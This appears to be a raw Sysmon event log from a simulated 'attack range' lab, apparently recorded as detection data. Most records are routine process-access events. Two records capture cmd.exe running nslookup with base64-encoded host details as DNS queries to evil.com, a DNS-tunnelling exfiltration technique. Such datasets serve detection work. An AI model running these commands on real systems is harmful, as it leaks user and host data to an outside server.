10341000x8000000000000000214108Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.001{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214107Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.001{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214106Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.001{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214105Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.001{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-18FB-629A-C045-000000005F02}7316C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000214104Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.001{2E1864BB-18FA-629A-BE45-000000005F02}78845764C:\Windows\system32\cmd.exe{2E1864BB-18FB-629A-C045-000000005F02}7316C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000214103Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.009{2E1864BB-18FB-629A-C045-000000005F02}7316C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A VXNlckZ1bGxOYW1lOiA= evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-18FA-629A-BE45-000000005F02}7884C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckZ1bGxOYW1lOiA= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlbkk.tmp 2>&1 10341000x800000000000000044833Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:21:47.722{0A5DF930-E3BF-6299-A100-000000006002}31841748C:\Windows\system32\conhost.exe{0A5DF930-18FB-629A-3007-000000006002}3008C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044832Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:21:47.722{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044831Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:21:47.722{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044830Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:21:47.722{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044829Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:21:47.722{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044828Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:21:47.722{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044827Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:21:47.722{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044826Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:21:47.722{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044825Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:21:47.722{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044824Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:21:47.722{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044823Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:21:47.722{0A5DF930-E35B-6299-0500-000000006002}412528C:\Windows\system32\csrss.exe{0A5DF930-18FB-629A-3007-000000006002}3008C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000044822Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:21:47.722{0A5DF930-E3BE-6299-9D00-000000006002}20843480C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0A5DF930-18FB-629A-3007-000000006002}3008C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000044821Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:21:47.722{0A5DF930-18FB-629A-3007-000000006002}3008C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.2.5Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0A5DF930-E35B-6299-E703-000000000000}0x3e70SystemMD5=92BD3C71158FA8B9A0821D43564A56E7,SHA256=7850C91F8D08679D7A0579D350C08CA6F6EDEA8A12226ADC2E30B4ABF8CE0BE2,IMPHASH=FD2D4472615B421BAEF1D51F46EF5F52{0A5DF930-E3BE-6299-9D00-000000006002}2084C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000044820Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:21:47.597{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1D4834F7716784F735D0EB71199A47CC,SHA256=91E95C66B4C0765EDBC466131847BF8AA2DEE4C8FD24B1E0B219E6F67BD25B6C,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000214787Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:48.982{2E1864BB-18FC-629A-0746-000000005F02}48324012C:\Windows\system32\conhost.exe{2E1864BB-18FC-629A-0846-000000005F02}1372C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214786Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:48.967{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214785Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:48.967{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214784Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:48.967{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214783Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:48.967{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214782Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:48.967{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-18FC-629A-0846-000000005F02}1372C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000214781Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:48.967{2E1864BB-18FC-629A-0646-000000005F02}81403288C:\Windows\system32\cmd.exe{2E1864BB-18FC-629A-0846-000000005F02}1372C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000214780Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:48.979{2E1864BB-18FC-629A-0846-000000005F02}1372C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVEZXNjOiBEZWZhdWx0IHNoYXJl evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-18FC-629A-0646-000000005F02}8140C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVEZXNjOiBEZWZhdWx0IHNoYXJl evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlpjgx.tmp 2>&1 10341000x8000000000000000214779Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 